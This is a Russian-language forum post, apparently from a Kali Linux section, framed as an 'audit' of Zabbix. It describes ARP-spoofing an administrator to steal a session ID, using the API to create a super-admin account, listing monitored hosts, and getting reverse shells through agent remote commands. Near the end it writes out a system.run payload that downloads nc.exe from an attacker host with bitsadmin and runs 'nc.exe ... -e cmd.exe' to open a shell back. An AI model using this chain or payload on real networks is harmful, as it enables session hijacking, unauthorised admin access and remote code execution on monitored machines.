Загрузка...

Проводим аудит Zabbix

Тема в разделе Kali Linux создана пользователем mrJollier 24 май 2018. 346 просмотров

Загрузка...
  1. mrJollier
    mrJollier Автор темы 24 май 2018 Всё ещё живой 540 15 фев 2017
    Поведать я Вам сегодня хочу о брешах в заббиксе. В нем периодически что-либо находят, поэтому остановимся пока на одной теме – API.

    Что мы имеем: наша машина находится в пределах одного широковещательного запроса с админом, который залогинен в системе мониторинга.

    Первым делом нам нужно поснифать трафик админа и поймать в нем id его сессии в заббиксе. (по большому счету не важно, как вы этот id добудете – в данном примере через mitm)

    Можно использовать mitmf, можно еще что-нибудь. Я пошел классическим способом, обычный arpspoof:

    [IMG]
    Параллельно запустил скрипт, который из трафика выдергивает нужные нам id:

    [IMG]
    Вот сам скрипт - pastebin.com/AaNZZUDm

    Отлично. Сессию админа перехватили. Далее нужно эту сессию скормить в API и создать нового пользователя. Для начала установим модуль PyZabbix:

    $ pip install pyzabbix



    Запускаем скрипт:

    [IMG]
    В нем указываем путь до API забикса (по умолчанию http://x.x.x.x/zabbix/api_jsonrpc.php) и будущие логин и пароль.

    Скрипт после создания пользователя проверил подключение. Как видим – все ок.

    Логинимся в админку – и о чудо – у нас права супер админа


    А что, если попробовать провести атаку на хосты, которые мониторятся заббиксом? Сказано – сделано. Для начала через тот же API запросим у сервера, какие хосты он мониторит. Как раньше, ****аем адрес API, наш созданный логин и пароль:

    Скрипт - https://pastebin.com/LMiE23X1

    [IMG]
    После буквы “u” написаны имена обслуживаемых хостов. Сохраняем их. Они нам понадобятся дальше.

    И напоследок запускаем этот скрипт

    [IMG]
    [IMG]
    Снова вводим наши логин и пароль, запускаем NetCat на прослушивание порта, который мы указали в скрипте, в поле enter hostname указываем имя хоста с результата работы предыдущего скрипта. Получаем бэк конект на нашу машину. Это возможно из-за встроенной возможности с сервера посылать команды на агент на хосте. Единственное условие, чтобы в конфиге агента zabbix_agentd.conf был активирован параметр EnableRemoteCommands=1. Не важно на какой ОС установлен агент - главное чтобы он был. Соответственно работает и в Windows:

    [IMG]
    Нужно в скрипте прописать в параметре key:

    system.run["bitsadmin.exe /transfer /download http://x.x.x.x/nc.exe C:\\Temp\\nc.exe && C:\Temp\\nc.exe x.x.x.x 3333 -e cmd.exe"]

    Предварительно запустив апач и положив туда nc.exe
     
Top